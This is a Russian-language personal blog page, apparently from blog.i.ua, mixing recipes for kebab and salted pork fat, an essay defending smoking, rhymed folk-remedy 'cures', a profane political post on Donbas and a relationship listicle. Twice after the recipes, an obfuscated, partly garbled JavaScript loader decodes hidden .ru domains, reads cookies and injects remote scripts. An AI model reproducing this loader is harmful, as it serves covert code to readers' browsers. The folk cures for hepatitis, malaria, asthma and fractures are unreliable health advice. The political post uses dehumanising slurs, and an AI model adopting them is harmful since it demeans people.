Профіль

Трансперсона

Трансперсона

Непал, Катманду

Рейтинг в розділі:

Кровь обезьяны

  • 15.11.15, 12:04
https://my-hit.org/film/13169/

Как хотим, так и кончаем!

  • 11.11.15, 22:00
+TОткуда такая агрессия общества в отношении курящих, убежденность, что курение – отрава?   Бездумно повторяемые заклинания.  И я повторяла их вслед за всеми, пока не  пришлось заплатить за них немалую цену.

Откуда такая агрессия общества в отношении курящих, убежденность, что курение – отрава?   Бездумно повторяемые заклинания.  И я повторяла их вслед за всеми, пока не  пришлось заплатить за них немалую цену.

Я курила с 15 лет.  Родители, а потом и муж взывали к моему разуму. Разум позволил себя наконец уговорить, и в 31 я бросила.  Враз и влегкую. Через пару месяцев мысль о сигарете вызывала недоумение, запах дыма в помещении -- отвращение, а смолящие академические дамы – жалость.

А через год накатило… Жизнь стала невыносимой.  По утрам не понимала, где взять силы чтобы прожить день. Рыдала в кровати в ожидании вечера, когда можно заснуть. Только во сне не было тоски от бессмысленности жизни. Даже сын, который был рядом, не помогал собраться.  Мысль, что несчастная мать мало что может дать ребенку вызывала очередной приступ рыданий. Одна радость в жизни осталась: уже год не курю и не тянет.    

Хватило ума пойти к психотерапевту.  Врач, Ирина Анатольевна, ужаснулась моим потухшим глазам, сказав, что депрессию такой силы видела редко.  Четыре раза в день я глотала горсть таблеток, в каждый прием свой «коктейль».  Дозы – от полтаблетки до осьмушки, -- Ирина Анатольевна была врачом от бога.   Она работала со мной, меняла прописи коктейлей, и только через три месяца спросила:

- Курить хочется?

- Что вы! -- ответила я. – Уже больше года не курю! 

 Мой разум давно отверг курение. А организм – вегетативная, церебральная, гормональная и какие там еще есть системы – черта с два.  И сколько еще травм для моей психики потребует их примирение с моим разумом…  

- Знаешь, девочка, -- сказала Ирина очень серьезно, -- ты уж лучше кури.    

В сумочке вновь поселились сигареты, но депрессия не исчезла.  Ни враз, ни влегкую. Она то отступала, то подступала. Причем без всякой связи с количеством выкуренных сигарет.  Окончательно исчезла через два года.  

Итак, итог!  Цена борьбы за здоровье -- полтора года мук и два года на «колесах».

Курить действительно не полезно.  А что, другой отравы в жизни нет?  Убеждены, что  вред от курения – самый вредный?  Больше нравятся другие?  Их полно.

Можно разрушать поджелудочную пережаренным мясом с кетчупом,  сердце и позвоночник избыточным весом, а гормональную систему голодными диетами. Ах, вы ведете здоровый образ жизни?  Гонитесь за здоровьем на велике по Бульварному кольцу, среди сизого дыма грузовиков?  Ваш выбор.  Никому не запретить жить в гармонии с собственными заблуждениями.  

И еще спрашивают, откуда идет психотизация общества!  Если вам будут каждый день вправлять мозги, что вы роете себе могилу, орудуя вилкой или крутя велосипедную педаль -- и родные, и медики, и зомбиящик, и все, кому не лень... Знаете, что с вами произойдет?  Вы превратитесь в психов!    

Курильщики страдают до самолета два часа и еще 3-5 часов в полете.  Четыре часа в «Сапсане» и неделю в отеле в чужом городе.   Ненавидя при этом угнетателей и копя агрессию.  Ах, некурящим вреден наш дым? Так откройте рестораны специально для нас и пусть адепты ЗОЖ обходят их стороной. Верните нам салоны-вагоны, этажи в отелях для курящих.  В аэропортах Вены и Женевы в зонах прилета кофейни.  Там с ходу после лишений во время перелета можно выпить двойной эспрессо и выкурить пару сигарет.  И после этого идти дальше по жизни с улыбкой.  

А кроме нашего дыма окружающим больше ничего не вредно? Как насчет плача младенцев в течение часов полета?  Визга детей в ресторанах?  В мозг будто ввинчивается бур, при этом страшно жалко ребенка и ничего нельзя изменить, -- тройной удар по психике.  Но дети – это святое!  Общество должно не просто терпеть, а любить эти крики. Буквально-таки ловить кайф от того, что жизнь продолжается.  В ресторане, где дети орут – от усталости или просто скуки, -- надо умилятся тому, что они бросают еду на пол и с криком носятся по проходам.  А потом заходятся в истерике. Надо считаться с тем, что родителям приспичило в ресторан, а детей оставить не с кем. И в конце-то концов! Родители сами вправе решать, как именно травмировать психику своих детей.

Табак – это вам не дети.  Это абсолютное зло.  И считаться с курильщиками нечего. Мой запах дыма на пляже может злить соседа, а его запах пота или перегара меня злить не имеет право.  У курильщиков вообще нет прав.  Их надо с пляжа гнать! И изо всех остальных общественных мест тоже гнать!  Чтобы дети не видели дурного примера.  А то других дурных примеров они не видят, что дома, что на улице.

Если, никотин такой бесспорный общественный вред, запретите его производство и продажу!  Слабо? Почему?  Помимо урона для казны, конечно…  Потому что это откровенное попрание свободы выбора.  Откровенное – смущает, лучше лицемерное. 

Лучше теснить курильщиков на жизненном пространстве. Делать из них изгоев.  Назначить их жертвами. Организовать террор против миллионов.  Убеждать расстаться с нехорошей привычкой, а самим испытывать оргазм от высокого чувства собственной ответственности за судьбы заблудших душ.

Мне не нужна ответственность общества за меня.  Более чем хватило двух лет психотропных препаратов, чтобы усвоить, что только я сама могу за нее отвечать.  И мне, и другим курильщикам обрыдлы  нравоучения,  желание непременно открыть нам глаза.    Что «курение осложняет беременность» и «вызывает импотенцию» одновременно.  Что «курящая женщина кончает раком».  Можно, мы сами будем решать, где, с кем и как именно нам кончать?  

Но руки чешутся кого-то непременно травить, долбать и поучать, -- курящих, толстых или, наоборот, худых.  Потребность ломать людей через колено.  От этого диктата большинства вреда курильщикам куда больший, чем от сигарет.  Обществу – едва ли вред меньший.  «Курить я начала во время войны.  Это и сохранило мне здоровье».  Много аллюзий вызывают эти слова Марлен Дитрих…  

Слушайте, курильщики, только себя.  Это ваш организм, ваша жизнь, и только вы знаете, что для вас благо, а что – вред.   Пошлите на три буквы советчиков, включая адептов ЗОЖ и всех иных ответственных за судьбу мира.  «А у кого чешутся руки, пусть почешут их в другом месте».  Автор цитаты известен

Шашлык в банке

  • 02.08.15, 00:32

Шашлык в банке - необыкновенный рецепт! Просто бесподобный рецепт! Потрясающе вкусный! Обязательно попробуйте!

Пожалуй, это самый необычный рецепт шашлыка, который мне когда-либо встречался. Однако, на вкус выходит — просто супер, не хуже, чем с костра!

Ингредиенты для шашлыка в банке

свинина (антрекот) — 1 кг
бекон — 250 г
лук репчатый — 2-3 шт.
сок лимона
вода — 100 мл
соль
перец
кориандр
приправы для шашлыка

Способ приготовления шашлыка в банке

Мясо промыть и порезать на небольшие кусочки.
Добавить соль, перец, специи и сок лимона.
Лук порезать кольцами и добавить к мясу, добавить воду. Оставить мариноваться на 30 минут.
Бекон порезать тонкими полосами.
Нанизываем на шашлычные палочки мясо, чередуя с беконом и луком.
На дно банки кладем оставшийся лук, в каждую банку кладем 4-5 «шампуров».
Закрываем банку фольгой. Важно! Банка должна быть сухая снаружи.
Отправляем в холодную духовку (чтоб банка не лопнула), и ставим на 180-200 С на 60-80 минут.
Аккуратно открываем духовку, чтоб при разнице температур не лопнула банка.
Достаем потрясающе аппетитный шашлык!

Sergey  Chepinogas Foto.
Sergey  Chepinogas Foto.
Sergey  Chepinogas Foto.
Sergey  Chepinogas Foto.
Sergey  Chepinogas Foto.

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10028",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();

Засолка сала

  • 02.08.15, 00:16

11 способов засолки сала.
=================================== 
Чтобы не потерять рецепт, жмите класс, а потом поделиться
==================================
САЛО ПО-ДОМАШНЕМУ - РЕЦЕПТЫ.Устоять - невозможно - рекомендую !!! C нами ты научишься готовить ВКУСНО! Рекомендую 
Самый элементарный способ засолки сала

Сало режем на куски размером с кулак, заранее чистим чеснок из расчета 1 зубчик на 1 кусок сала и этот чеснок режем на кругляшки. Подготавливаем специи - хмели-сунели, перец, молотые семена укропа или любые другие, которые вам нравятся.

На дно эмалированной кастрюли насыпаем немного приправ, перца и чеснока. Потом берем в левую руку кусок сала, в правую пригоршню крупной соли и натираем кусок сала этой солью над кастрюлей. После этого укладываем сало в кастрюлю кожей вниз и повторяем операцию с другим куском сала, пересыпая все специями и чесноком. Соли не жалейте!

Затем сало немного утрамбовываем в посудине, накрываем крышкой меньшего диаметра или тарелкой, сверху ставим небольшой гнет (например, 3-литровую банку с водой) - и в теплое место на 3-4 дня.

После этого сало уже почти готово - осталось только вытащить его из посудины, стряхнуть сок, завернуть в хлопчатобумажную тряпочку и положить в холодильник. Как только замерзнет, можно наслаждаться неповторимым вкусом.

Засолка сала сухим способом

На 1 кг сала потребуются 2-3 головки чеснока, приправы (кориандр, красный молотый перец, тмин, чеснок, базилик, паприка, лавровый лист, чабрец), соль.

Сало режем на куски размером 10х15 см, в них делаем глубокие надрезы через каждые 3-5 см (до самой шкурки). Шпигуем сало чесноком, натираем смесью приправ, обваливаем в соли и плотно укладываем слоями в эмалированную посуду, щедро пересыпая каждый слой солью (помните, что солью сало не испортить!). Поставим теперь в прохладное место - и через 5 дней сало будет готово.

Засолка сала в рассоле с луковой шелухой – очень старинный способ. Так солили сало не только наши бабушки, но, пожалуй, и прапрабабушки. Сало лучше всего брать с мясными прослойками, например, грудинку, так как такое легкое приваривание является оптимальной обработкой для мяса.

Засолка сала мокрым способом

В солевом растворе (из расчета 1 кг соли на 1 л воды) кипятим луковую шелуху и приправы. Затем уменьшаем огонь, кладем в рассол сало, нарезанное на кусочки размером 10x15 см, и варим 1,5-2 часа. Вынимаем кусочки, даем немного остыть и натираем смесью из толченого чеснока, соли и приправ. Заворачиваем в полотно и оставляем на сутки при комнатной температуре, потом убираем в холодильник.

Вот еще несколько способов засолки сала в луковой шелухе. При таком способе засолки сало по вкусу похоже на копченое.

Способ №1

На 2 литра воды потребуется горсть луковой шелухи и 3 ст. ложки соли.

Рассол вскипятить, процедить, заложить в этот рассол сало (примерно 2 кг), кипятить 15 минут, затем снять с огня и оставить сало в рассоле на 8-12 часов. По истечении этого времени сало вынуть из рассола, обильно натереть чесноком, черным перцем, завернуть в пергаментную бумагу и отправить в холодильник на день-два. Готово. Если сделали много, не переживайте. Такое сало долго хранится в морозилке.

Способ №2

На 1-1,5 кг грудинки или сала потребуется 1 небольшая головка чеснока. Для рассола: 1 л воды, стакана соли крупного помола, 1 горсть луковой шелухи (с 5-7 луковиц), при желании 3 лавровых листа, 15 горошин черного перца.

Все специи вместе с солью и луковой шелухой положить в кастрюлю и залить водой. Довести до кипения, положить сало так, чтобы оно было покрыто рассолом, кипятить 10 минут. Кастрюлю снять с огня и оставить в рассоле на сутки. После того как рассол остынет, кастрюлю поставить в холодильник.

Затем сало вынуть из рассола и дать ему полежать в тарелке 15 минут, чтобы стек лишний рассол. Чеснок выдавить через пресс и обмазать им сало со всех сторон. Убрать сало в холодильник на сутки. Затем переложить в морозильную камеру.

Способ №3

Покупаете свежее сало. Делаете надрезы до шкурки, круто солите солью крупного помола и складываете в широкую миску, сверху кладете гнет (можно также широкую миску с водой или кастрюлю).

Через сутки все сало и соль перекладываете в кастрюлю, заливаете водой на один-два пальца выше сала, добавляете всяких пряностей (какие вам нравятся), лавровый лист и обязательно луковой шелухи побольше (именно она впоследствии даст оригинальный цвет, вкус и запах).

Варится все это в течение часа. Потом даете содержимому остыть до комнатной температуры. Сало вынимается из кастрюли, шпигуется (натирается давленым) чесноком, перчится (молотым красным, черным перцем) по вкусу, заворачивается в кальку (пергаментную бумагу, фольгу), перематывается обыкновенной ниткой, чтобы калька не разматывалась, и кладется в морозильник. Через сутки сало готово к употреблению.

Способ №4 (острое сало)

Этот рецепт для тех, кто не прочь побаловаться остреньким.

Для рассола потребуется 7 стаканов воды, 1 стакан крупной соли, горсть луковой шелухи.

Все это довести до кипения, кипятить 5 минут. Затем положить в рассол куски сала (чтобы вода их полностью покрывала). Кипятить 10-20 минут (если свинья была старой – 20 минут, если молодой – 10). Оставить на сутки в рассоле. После этого вынуть сало из рассола, дать стечь воде. Натереть чесноком и красным перцем. Положить в холодильник, желательно в морозилку (так получается вкуснее).

Способ №5 (острое сало)

Потребуется 1 кг сала, 400 г соли, луковая шелуха, красный молотый перец, чеснок и другие специи по вкусу.

Приготовить соляной раствор (на 1 литр кипяченой воды - 400 граммов соли). В раствор добавить горсть луковой шелухи. 1 килограмм сырого сала (его можно засолить одним куском или же нарезать небольшими кусочками) замочить в соляном растворе на 12 часов. Сало должно быть покрыто раствором. После замачивания поставить на огонь и довести до кипения. Кипятить на медленном огне 3 минуты (не больше).

Дать салу остыть в соляном растворе. Остывшее сало натереть солью (небольшим количеством), чесноком и красным молотым перцем. Дать салу пропитаться специями - и оно готово к употреблению.

Сало в рассоле «тузлук»

Приготовленное таким способом сало не стареет, не желтеет и долго хранится, сохраняя отличные вкусовые качества.

Чтобы посолить 2 кг сала, приготовим рассол: на 5 стаканов воды потребуется 1 стакан соли. Рассол вскипятим, остудим до комнатной температуры.

А тем временем нарежем сало небольшими кусками (чтобы удобно было доставать) и уложим неплотно (!) в 3-литровую банку, добавив между слоями 3-5 лавровых листика, черный перец горошком, 5-8 зубчиков чеснока.

Зальем рассолом, прикроем неплотно крышкой. Неделю будем держать в комнате (уже будет готово к употреблению), затем вынесем на холод. Обычно на такую емкость (3-литровая банка) идет не более 2-х кг сала. Главное - не укладывать куски очень плотно в банку, иначе сало просто «задохнется».

Сало с чесноком

Способ №1

Берем свежее сало с мягкой шкуркой, еще лучше, если оно будет с мясными прожилочками. Режем его на куски размером 5х10 см. Щедро натираем солью. Плотно в один слой укладываем в эмалированную посуду.

5-7 крупных зубчиков чеснока режем на дольки (не слишком мелко). Посыпаем так, чтобы сало было равномерно обработано. Посыпаем молотым черным душистым перчиком (на слой потребуется 1 ч. ложка). Затем укладываем, если нужно, второй слой и т.д., в зависимости от количества сала, которое мы солим. Накрываем посуду тарелкой, которая плотно входит в кастрюлю (как под гнет). И оставляем в покое при комнатной температуре примерно на 2 дня. На второй день вы уже почувствуете запах! Но пусть уж лучше постоит еще денек.

Затем вынимаем сало из кастрюльки. Куски сала отдельно заворачиваем в бумагу. Чесночек, который был в кастрюле вместе с салом, оставляем при нем. Хранить завернутые в холщовый или целлофановый мешочек куски сала лучше в морозилке.

Способ №2

Воду кипятят с лавровым листом, горошинами черного перца, укропом и солью. Соль берут в таком количестве, чтобы помещенные в раствор сырое яйцо или картофелина не тонули. В остывший рассол опускают тертый чеснок и сало, нарезанное брусками шириной 4 см и длиной 20-25 см.

Продукт готов к употреблению примерно через неделю. Перед употреблением сало вынимают из рассола, обсушивают салфеткой и помещают на 2-3 часа в холодильник.

При таком способе соления сало сохраняет «свежий» вкус на протяжении всего периода хранения.

Способ №3

Свежее сало режут на куски по 250-350 г и складывают в эмалированную кастрюлю слоями, пересыпая толченым чесноком. Горошины черного перца вдавливают в каждый брусок по 6-8 штук. Затем кипятят воду с лавровым листом и солью (соли столько, чтобы всплывал брошенный туда кусочек сырого картофеля). После остывания рассола заливают им сало, придавливают гнетом и выдерживают 10-12 дней. Затем куски вынимают, обсушивают и хранят на холоде.

Способ №4 (с чесноком и специями)

Этому способу засолки поддается любое сало - как мягкое, так и жесткое.

Сало разрезать на куски размером с ладонь или чуть меньше. Острым ножом проткнуть в них дырки по 1,5-2 см глубиной и заложить в них кусочки чеснока (количество его зависит от вашей любви к чесноку). Затем нужно проткнуть новые дырочки поменьше и заложить в них горошины перца – по вашему вкусу. Каждый кусок сала обвалять в смеси любимых специй и хорошо эту смесь втереть в сало. Куски сала плотно уложить на бок в глубокую эмалированную кастрюлю.

Приготовить очень крутой рассол, не жалея соли, т.к., как мы уже знаем, сало возьмет соли ровно столько, сколько ему нужно. Добавить в рассол лавровый лист и все те же специи по вкусу, довести до кипения и снять с огня. Рассол остудить и теплым залить сало.

Когда содержимое кастрюли полностью остынет, кастрюлю убрать в холодильник. Через неделю сало будет готово. Его следует вытащить из рассола, чуть обсушить, завернуть в кальку или пергаментную бумагу и поместить в морозилку.

Соленое сало, приготовленное любым способом, можно и подкоптить, если позволяют условия. Сделать это можно с помощью самой элементарной коптильни.

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10028",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();

Советы от бабушки

  • 07.07.15, 16:58

СОВЕТЫ ОТ БАБУШКИ...„smile“-Emoticon

- Воду пей перед едой – будешь долго молодой.
- Коже рук вернет былое сок чесночный и алоэ.
- Гепатиту гибель дарят корни ревеня в отваре.
- Чем старее мужичок, тем важней ему лучок!
- Вену видно изнутри – уксус яблочный вотри.

- Натощак зуб чеснока – сутки вирус в дураках.
- Мёд, лимоны и чеснок одышку пустят наутек.
- Глицерин, лимон и мед съешь, и кашель отойдет.
- Мёд с морковью, облепихой язву ног осадят лихо.
- Ревматизм натри и грей соком редьки почерней.

- Болят суставы и спина – вотри репейник - семена.
- Артрит, подагру и склероз питай арбузами до слёз.
- Если есть грибок в ногах – по траве носись в лугах.
- При чесотке не мореной кожу парь в воде соленой.
- Настой из семечек укропа при энурезе чаще лопай.

- Лист осиновый приложь – геморрой не будет гож!
- В стопы ног лимон вотри – боль не явится внутри.
- Нужный в яблоках пектин гонит прочь холестерин.
- Фарингит гнетут лимон плюс шиповник, мед и сон.
- Огурец, морковь и свекла гонят камни смесью сока.

- Приложи к радикулиту лист от хрена свежий, битый.
- Отвар сухих корней арбуза смоет твой колит из пуза.
- Малярии нет в помине, коль спишь в ворохе полыни.
- Коль желудок портит стул – подорожник ешь, как мул.
- Скрой живицей недуг ног, чтоб без боли шастать мог.

- Коль заел фурункулез – каждый день ешь лук до слёз.
- Сок свекольный чаще пей, чтоб не знал живот камней.
- Хочешь быть всегда здоров – пчел паси, не докторов!
- Если здравия все ж мало – ешь чеснок, горчицу, сало.
- Прячь ожог, где будет пир, под картофельный мундир.

- Насморк, кашель, голова – лук с медком прими сперва.
- Пей от кашля сок берёзы с молоком парным, без дозы.
- Чтоб срастались переломы, ешь скорлупки до истомы.
- Три петрушкой с чесноком дерматит, коль есть на ком!
- Можжевельник - масло с ягод лечит раны так, как надо.

- В глухоту гож клевер красный – пей отварчик ежечасно.
- Пей настой цветков от липы и мать-мачехи при гриппе.
- На водке почки от березы микробов губят с малой дозы.
- Огуречный сок с морковным не оставят лик бескровным.
- Артроз и судороги ног боятся валеных сапог, насыпь в те валенки гороху, ходи в них чаще и не охай!

- Коль соли в пятке допекли, за можжевельником беги – настой на водке из корней перед едой по ложке пей.
- Плохо спишь, боль в голове – съешь капусты дольки две.
- Нерв седалищный болит – грей кирпич, пусть с ним и спит.
- Заешь обед кусочком сыра – в зубах не будет места дырам.
- Прополис в водочке с аиром зубную боль оставит с миром.

- Геморрой пройдёт без крови – пей, как чай, ботву моркови.
- Прополис в спирте вместе с мёдом ангину вылечит на годы.
- Соки пей, меняй продукты – проживешь здоровым фруктом.
- Держи занозу в керосине, в нем та слаба, как ёж в трясине.
- Ожог закрой морковью с тёрки, чуть облепихи иль касторки.

- Сгодится может и медок, коль не слизнет его едок.
- Боль в ногах – парь в чане смело вместе с травкой чистотела.
- Кипяти овёс фуражный в разведенном молоке, против астмы пей. И даже… камни выйдут налегке.
- Гепатит боится хрена – пей настой перед едой; с молоком хрен непременно гонит вон песок крутой.


что будет с ватой после освобождения Донбасса

  • 23.06.15, 07:55
Профессор истории популярно рассказал, что будет с ватой после освобождения Донбасса

Пришло письмо от корреспондентки с вопросом: «Ну, ладно, каратели, а что вы будете делать, с ватой, если все-таки, захватите ДНР и ЛНР? Убиваць? Выселяць? Караць?»


Я сначала хотел ей ответить тоже личным письмом, но потом подумал, что это уже не первый такой вопрос, и лучше ответить одним открытым прогоном. Читайте также : Путин приказал выиграть войну до мобилизации любой ценой  

Мадам, ваш вопрос составлен безграмотно. Во-первых, не «захватим», а освободим, во-вторых, не «если», а когда. Представьте, я вас спрошу: «Когда вы станете блядью – сколько вы будете брать за сеанс с аналом?» Конечно, вы возмутитесь такой постановкой вопроса, правда? Вы будете кричать: «Да что вы себе такое позволяете, пан профессор!» - а я пожму плечами и скажу: «А шо такое? Уже и спросить нельзя? Нисколько – так нисколько…» 


Так что спрашивать надо без подъебки, если хотите получить ответ. А не ответную подъебку.

Для начала сообщим, что кафедра принципиально не занимается ясновидением, хиромантией, гаданием на картах и пророчествованием. Также мы избегаем политических прогнозов, потому что это мелковато для ноук. Прогноз делается на завтра-послезавтра, а мы оперируем масштабными процессами, и даже текущая ситуация для нас только или подтверждение, или опровержение ноучных предположений, а не повод радостно скакать: «ага, я же говорил!»

Если металлический шарик запустить в рукомойник, то он, проделав определенное количество кругов по раковине, в итоге булькнет в сток. Так вот, нехай аналитики и ясновидящие занимаются прогнозированием количества намотанных кругов, учоным достаточно знать только то, что «бульк» неизбежен, ибо гравитация.

Мистический эффект от ноук возникает оттого, что учоные, кроме гравитации, знают еще и о существовании сантехнического колена, и когда шарик уже навсегда пропал для обывателя, учоный может где-то там поковыряться под раковиной и извлечь шарик на божий свет. Лично я несколько раз так возвращал из небытия золотые бранзулетки, что вызывало у рыдающих девушек шоковый эффект.

После таких чудес обыватели приходят к учоным и спрашивают шепотом: «А скажите, профессор, какой через месяц будет курс рубля к доллару?» Ну, ноука говорит только то, что если через месяц будет рубль, и будет доллар, то у них будет какой-то курс.

Це була преамбула, а зараз будет ноучная амбула. 

***
Мне, честно говоря, не хочется говорить о вате, потому что снова начнется плач о пенсионерах, российских снегирях и кормящих грудью инвалидах, а этот плач мне остопиздел еще после инструкции о кормлении голубей. Поэтому я буду говорить о том, как шарик катается по рукомойнику.

Почему не «если», а «когда». Чтобы завести собственную Анчурию, недостаточно придумать аббревиатуру из трех букв, попросить художника из областного Дома Культуры нарисовать флаг и назначить друг друга министрами туризма и культуры. Если, по факту, нет ни туризма, ни культуры. Это детсадовский утренник, где дети в кроликов и снежинок наряжаются, а не государство.

Современные государства хитро устроены и интегрированы в мировое сообщество. Жить отдельно от мира можно, являясь или автаркией размером на континент, типа СССР, или на уровне попытки раннего прединдастриала, типа Римской империи (если бы, канешно, барбары не разваляли ее в хлам).

Для понимания величия Римской империи – наряду с постройкой грандиозных акведуков, в общественных туалетах посетители жопу вытирали одной и той же тряпкой, намотанной на палку. Предварительно поболтав ею в горшке с водой. Ну, вот это нормальный доиндустриальный уровень, и именно к этому надо готовиться жителям прокаженных регионов, если наши каратели придут туда слишком поздно - когда инфраструктура догниет до логического конца, а последние медные провода спиздят отступающие «народные ополченцы Донбасса из Сибирско-Нанайского казачьего Великого Войска».

То есть, так можно жить, конечно. Римляне же жили. Но не всем это понравится, особенно тем, кто привык к горячей воде из крана.

Подобные анчурии в мире если и существуют, то опираясь на поддержку мирового сообщества, или конкретного Папы. 

Например, европейская анчурия типа Черногории. В мире любят монтениггеров, они не злые и гостеприимные. Потому их не обижают, охотно дают им в долг и ездят к ним отдыхать. Нахуя, кому и с какой целью нужна агрессивная страна гоблинов, терриконов и ржавых вагонеток – мне, например, решительно непонятно.

Для примера предлагаю сравнительное изучение истории и быта Гаити, примерно эпохи Папы Дювалье – и современной. Ездить туда решительно не советую, но, погуглив хотя бы часок, даже кацап на всю жизнь перестает путать Гаити и Таити, как триппер и флиппер. Гаитян кормили какое-то время всем миром, потом устали, послали их нахуй, и они перешли на питательные лепешки из каолина.

Примерно такова судьба анчурии, с которой Хозяин наигрался и больше воно йому не треба.

Оптимистическим долбоебам из донбасской анчурии, верующим в «роисянампоможет», сообщаю, что настоящие гуманитарные колонны в мире выглядят не так, как белые тентованные грузовики типа «с тушенкой». Настоящая гуманитарная колонна, идущая в зону бедствия – это дизель-генераторы на автоплатформе, сопровождаемые цистернами с солярой, опционально – танки с питьевой водой (если, например, катастрофнуло цунамой на соленом побережье), одеяла и антибиотики, палатки, мешки с сухим молоком и квалифицированный персонал.

Гуманитарная помощь – это не богадельная пожизненная кормежка, а помощь в восстановлении временно нарушенных собственных связей и механизмов. Но если этих механизмов больше нет - то гуманитарному трупу гуманитарная помощь не нужна. Ему нужны гуманитарные похороны. Ну, назовем это эвакуацией.

То, что идет из Раисы, является клоунитарной помощью, а не гуманитарной. Потому что переть тушенку за четыре тысячи километров, если можно просто позвонить, проплатить безналом, и тушонку привезут с соседнего продовольственного склада, за сорок километров – это значит что пациента послали нахуй, и просто изображают трогательную заботу и интенсивную терапию. 

Дорогие лугандонцы! Вы России не нужны, как таковые. Вы ей нужны исключительно как геморрой для нас сейчас и трофическая язва в будущем. И чем вам хуже, тем им лучше.

Человеку в день надо два кило абстрактной еды и столько же воды. За вычетом тары, как подсказывает мой друг калькулятор, надо на свободолюбивые республики семьсот камазов жрачки ежедневно – это только покушать и попить. Электричество, стиральный порошок и одежда в список удовольствий не входят. Как понятно любому, даже неучоному, за такие деньги без отдачи эти великие страны никому не нужны.

Так шо не будет никакого дныр-лныр. Это не я так сказал, это шарик по рукомойнику так катится.

***
Однако если дамбасская вата в глазах кацапов является разменной сволочью, то в наших глазах она неразменная, потому что все равно – своя. 

Поэтому ничего страшного с ватой не случится. Каратели войдут в города, вата первый день будет испуганно смотреть на нее в щелку между штор, на второй день робко спрашивать у карателей – когда будет пенсия за май и горячая вода? А на третий день вата начнет недовольно ворчать – когда уже им отстроят стадион и аэропорт? Тем более што они тут мучительно страдали под российской оккупацией, пока во Львове прохлаждались.

Вату пошлют нахуй, объяснят, что лишних денег в стране на фейерверки ко Дню Шахтера нет, и приставят к какой-нибудь полезной работе за деньги. Как, собственно, было и раньше.

Вот, собственно, все карательные ужасы, которые мне приходят в голову, глядя на печаль происходящего. 

никогда не отпускайте ее

  • 21.05.15, 10:49
Если женщина обладает этими 12 качествами, никогда не отпускайте ее

— Несколько раз за свою жизнь всем удается встретить особенных женщин, одна из которых должна стать Той самой — женщиной вашей мечты. Эти встречи всегда неожиданны и крайне редко удобны для вас, но дама все равно появляется и меняет вашу жизнь навсегда.

Мы созданы природой таким образом, что позволяет двум противоположностям составлять одно целое. Поиск второй половинки — это путешествие, зачастую довольно изнурительное. Если вам повезло настолько, что вы нашли женщину, которая стала редкой красоты цветком в вашей бесплодной пустыне, держитесь за нее так сильно, как сможете, — никогда, никогда не отпускайте ее.

Не все из нас ведут себя разумно, встречая любовь своей жизни, и, поверьте мне, потом жалеют об этом. Если она сочетает в себе эти 12 качеств — никогда не позволяйте ей уйти.

Она умнее вас

